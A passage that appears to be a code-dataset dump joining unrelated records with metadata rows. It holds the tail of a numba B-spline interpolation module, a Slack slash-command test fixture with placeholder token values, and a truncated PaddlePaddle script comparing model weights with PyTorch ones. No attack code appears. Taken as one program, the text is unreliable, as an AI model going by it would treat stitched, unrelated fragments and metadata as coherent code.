+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ Phi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ Phi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
dvals[n, 0, k] = (
dPhi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ dPhi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ dPhi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ dPhi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
dvals[n, 1, k] = (
Phi0_0
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ Phi0_1
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ Phi0_2
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ Phi0_3
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
dvals[n, 2, k] = (
Phi0_0
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ Phi0_1
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ Phi0_2
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ Phi0_3
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
vals = vals[:, 0]
dvals = dvals[:, :, 0]
# used by njitted routines (frozen)
basis = np.array([1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0, 0.0])
@njit(cache=True)
def solve_deriv_interp_1d(bands, coefs):
M = coefs.shape[0] - 2
# Solve interpolating equations
# First and last rows are different
bands[0, 1] /= bands[0, 0]
bands[0, 2] /= bands[0, 0]
bands[0, 3] /= bands[0, 0]
bands[0, 0] = 1.0
bands[1, 1] -= bands[1, 0] * bands[0, 1]
bands[1, 2] -= bands[1, 0] * bands[0, 2]
bands[1, 3] -= bands[1, 0] * bands[0, 3]
bands[0, 0] = 0.0
bands[1, 2] /= bands[1, 1]
bands[1, 3] /= bands[1, 1]
bands[1, 1] = 1.0
# Now do rows 2 through M+1
for row in range(2, M + 1):
bands[row, 1] -= bands[row, 0] * bands[row - 1, 2]
bands[row, 3] -= bands[row, 0] * bands[row - 1, 3]
bands[row, 2] /= bands[row, 1]
bands[row, 3] /= bands[row, 1]
bands[row, 0] = 0.0
bands[row, 1] = 1.0
# Do last row
bands[M + 1, 1] -= bands[M + 1, 0] * bands[M - 1, 2]
bands[M + 1, 3] -= bands[M + 1, 0] * bands[M - 1, 3]
bands[M + 1, 2] -= bands[M + 1, 1] * bands[M, 2]
bands[M + 1, 3] -= bands[M + 1, 1] * bands[M, 3]
bands[M + 1, 3] /= bands[M + 1, 2]
bands[M + 1, 2] = 1.0
coefs[M + 1] = bands[(M + 1), 3]
# Now back substitute up
for row in range(M, 0, -1):
coefs[row] = bands[row, 3] - bands[row, 2] * coefs[row + 1]
# Finish with first row
coefs[0] = bands[0, 3] - bands[0, 1] * coefs[1] - bands[0, 2] * coefs[2]
@njit(cache=True)
def find_coefs_1d(delta_inv, M, data, coefs):
bands = np.zeros((M + 2, 4))
# Setup boundary conditions
abcd_left = np.zeros(4)
abcd_right = np.zeros(4)
# Left boundary
abcd_left[0] = 1.0 * delta_inv * delta_inv
abcd_left[1] = -2.0 * delta_inv * delta_inv
abcd_left[2] = 1.0 * delta_inv * delta_inv
abcd_left[3] = 0
# Right boundary
abcd_right[0] = 1.0 * delta_inv * delta_inv
abcd_right[1] = -2.0 * delta_inv * delta_inv
abcd_right[2] = 1.0 * delta_inv * delta_inv
abcd_right[3] = 0
for i in range(4):
bands[0, i] = abcd_left[i]
bands[M + 1, i] = abcd_right[i]
for i in range(M):
for j in range(3):
bands[i + 1, j] = basis[j]
bands[i + 1, 3] = data[i]
solve_deriv_interp_1d(bands, coefs)
@njit(cache=True)
def filter_coeffs_1d(dinv, data):
M = data.shape[0]
N = M + 2
coefs = np.zeros(N)
find_coefs_1d(dinv[0], M, data, coefs)
return coefs
@njit(cache=True)
def filter_coeffs_2d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Nx = Mx + 2
Ny = My + 2
coefs = np.zeros((Nx, Ny))
# First, solve in the X-direction
for iy in range(My):
find_coefs_1d(dinv[0], Mx, data[:, iy], coefs[:, iy])
# Now, solve in the Y-direction
for ix in range(Nx):
find_coefs_1d(dinv[1], My, coefs[ix, :], coefs[ix, :])
return coefs
@njit(cache=True)
def filter_coeffs_3d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Mz = data.shape[2]
Nx = Mx + 2
Ny = My + 2
Nz = Mz + 2
coefs = np.zeros((Nx, Ny, Nz))
for iy in range(My):
for iz in range(Mz):
find_coefs_1d(dinv[0], Mx, data[:, iy, iz], coefs[:, iy, iz])
# Now, solve in the Y-direction
for ix in range(Nx):
for iz in range(Mz):
find_coefs_1d(dinv[1], My, coefs[ix, :, iz], coefs[ix, :, iz])
# Now, solve in the Z-direction
for ix in range(Nx):
for iy in range(Ny):
find_coefs_1d(dinv[2], Mz, coefs[ix, iy, :], coefs[ix, iy, :])
return coefs
def filter_coeffs(smin, smax, orders, data):
smin = np.array(smin, dtype=float)
smax = np.array(smax, dtype=float)
dinv = (smax - smin) / orders
data = data.reshape(orders)
return filter_data(dinv, data)
def filter_data(dinv, data):
if len(dinv) == 1:
return filter_coeffs_1d(dinv, data)
elif len(dinv) == 2:
return filter_coeffs_2d(dinv, data)
elif len(dinv) == 3:
return filter_coeffs_3d(dinv, data)
| 36.148509 | 79 | 0.305125 | 8,050 | 59,392 | 2.055528 | 0.019255 | 0.147217 | 0.042062 | 0.050764 | 0.906207 | 0.877803 | 0.843657 | 0.829214 | 0.806672 | 0.687798 | 0 | 0.218647 | 0.540039 | 59,392 | 1,642 | 80 | 36.170524 | 0.387071 | 0.01182 | 0 | 0.667104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007864 | false | 0 | 0.002621 | 0 | 0.015072 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d6e743ad05286825f1ac9df51a546b65956a6ad7 | 1,070 | py | Python | slack/tests/data/commands.py | autoferrit/slack-sansio | 3b4d25e0c96745657cffe13699bf74304c74b026 | [
"MIT"
] | 39 | 2017-08-19T16:58:15.000Z | 2022-03-22T01:00:03.000Z | slack/tests/data/commands.py | autoferrit/slack-sansio | 3b4d25e0c96745657cffe13699bf74304c74b026 | [
"MIT"
] | 32 | 2017-08-24T18:14:32.000Z | 2019-07-25T16:57:55.000Z | slack/tests/data/commands.py | autoferrit/slack-sansio | 3b4d25e0c96745657cffe13699bf74304c74b026 | [
"MIT"
] | 10 | 2017-08-09T15:56:56.000Z | 2019-10-31T06:24:46.000Z | from enum import Enum
no_text = {
"token": "supersecuretoken",
"team_id": "T000AAA0A",
"team_domain": "teamdomain",
"channel_id": "C00000A00",
"channel_name": "general",
"user_id": "U000AA000",
"user_name": "myuser",
"command": "/test",
"text": "",
"response_url": "https://hooks.slack.com/actions/T000AAA0A/123456789123/YTC81HsJRuuGSLVFbSnlkJlh",
"trigger_id": "000000000.0000000000.e1bb750705a2f472e4476c4228cf4784",
}
text = {
"token": "supersecuretoken",
"team_id": "T000AAA0A",
"team_domain": "teamdomain",
"channel_id": "C00000A00",
"channel_name": "general",
"user_id": "U000AA000",
"user_name": "myuser",
"command": "/test",
"text": "foo bar",
"response_url": "https://hooks.slack.com/actions/T000AAA0A/123456789123/YTC81HsJRuuGSLVFbSnlkJlh",
"trigger_id": "000000000.0000000000.e1bb750705a2f472e4476c4228cf4784",
}
class Commands(Enum):
"""
List of available command for testing
- text
- no_text
"""
text = text
no_text = no_text
| 24.883721 | 102 | 0.642056 | 103 | 1,070 | 6.475728 | 0.417476 | 0.035982 | 0.044978 | 0.086957 | 0.842579 | 0.842579 | 0.842579 | 0.842579 | 0.842579 | 0.842579 | 0 | 0.178654 | 0.194393 | 1,070 | 42 | 103 | 25.47619 | 0.595128 | 0.058879 | 0 | 0.666667 | 0 | 0 | 0.612016 | 0.107943 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
baf28ea1c8601b1e756c4a9368ac1f2522a28b28 | 3,802 | py | Python | diff_weights_with_pytorch.py | miemie2013/ppgan | 48008d85ec6c5fa2e1469acf8507b2614fa550cc | [
"Apache-2.0"
] | null | null | null | diff_weights_with_pytorch.py | miemie2013/ppgan | 48008d85ec6c5fa2e1469acf8507b2614fa550cc | [
"Apache-2.0"
] | null | null | null | diff_weights_with_pytorch.py | miemie2013/ppgan | 48008d85ec6c5fa2e1469acf8507b2614fa550cc | [
"Apache-2.0"
] | 1 | 2022-01-19T03:01:13.000Z | 2022-01-19T03:01:13.000Z |
import torch
import paddle
import numpy as np
# ckpt_file = 'styleganv2ada_32_afhqcat.pdparams'
ckpt_file = 'styleganv2ada_32_afhqcat_step19_pytorch.pdparams'
state_dict_pytorch = paddle.load(ckpt_file)
# ======================== discriminator ========================
print('======================== discriminator ========================')
model_dic_pytorch = {}
for key, value in state_dict_pytorch['discriminator'].items():
model_dic_pytorch[key] = value.numpy()
# ckpt_file = 'D_00.pdparams'
ckpt_file = 'D_19.pdparams'
state_dict = paddle.load(ckpt_file)
model_dic_paddle = {}
for key, value in state_dict.items():
model_dic_paddle[key] = value.numpy()
for key, value in model_dic_paddle.items():
value2 = model_dic_pytorch[key]
ddd = np.sum((value - value2) ** 2)
# if ddd > 1.00001:
# print(key)
print('diff=%.6f (%s)' % (ddd, key))
print('==============================================')
print()
# ======================== synthesis_ema ========================
print('======================== synthesis_ema ========================')
model_dic_pytorch = {}
for key, value in state_dict_pytorch['synthesis_ema'].items():
model_dic_pytorch[key] = value.numpy()
ckpt_file = 'synthesis_ema_19.pdparams'
state_dict = paddle.load(ckpt_file)
model_dic_paddle = {}
for key, value in state_dict.items():
model_dic_paddle[key] = value.numpy()
for key, value in model_dic_paddle.items():
value2 = model_dic_pytorch[key]
ddd = np.sum((value - value2) ** 2)
# if ddd > 1.00001:
# print(key)
print('diff=%.6f (%s)' % (ddd, key))
print('==============================================')
print()
# ======================== synthesis ========================
print('======================== synthesis ========================')
model_dic_pytorch = {}
for key, value in state_dict_pytorch['synthesis'].items():
model_dic_pytorch[key] = value.numpy()
ckpt_file = 'synthesis_19.pdparams'
state_dict = paddle.load(ckpt_file)
model_dic_paddle = {}
for key, value in state_dict.items():
